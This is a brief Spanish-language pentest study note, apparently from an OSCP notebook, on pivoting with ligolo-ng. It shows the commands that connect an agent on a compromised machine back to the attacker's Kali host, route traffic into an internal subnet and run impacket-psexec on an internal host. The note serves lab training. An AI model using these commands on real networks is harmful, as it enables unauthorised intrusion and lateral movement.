# Pivoting (ligolo-ng) > Entrar en una **red interna** no enrutable desde Kali, a través de una máquina comprometida. En `tu carpeta`. ## El concepto ``` KALI 10.10.10.5 ── túnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno) ``` - **proxy** corre en Kali, **agent** en la víctima. - Añades una ruta y las tools tiran por el túnel **transparentemente**. ## Montaje ```bash # Kali (proxy): sudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up ./proxy -selfcert # Víctima (agent): ./agent -connect TU_IP:11601 -ignore-cert # En la consola de ligolo: session → start ; luego en Kali: sudo ip route add 192.168.5.0/24 dev ligolo ``` ## Resultado ```bash impacket-psexec admin@192.168.5.10 # el tráfico va por el túnel, transparente ``` Ahora Movimiento lateral y Active Directory funcionan contra la red interna. Relacionado: Puesto de mando Kali · OSCP MOC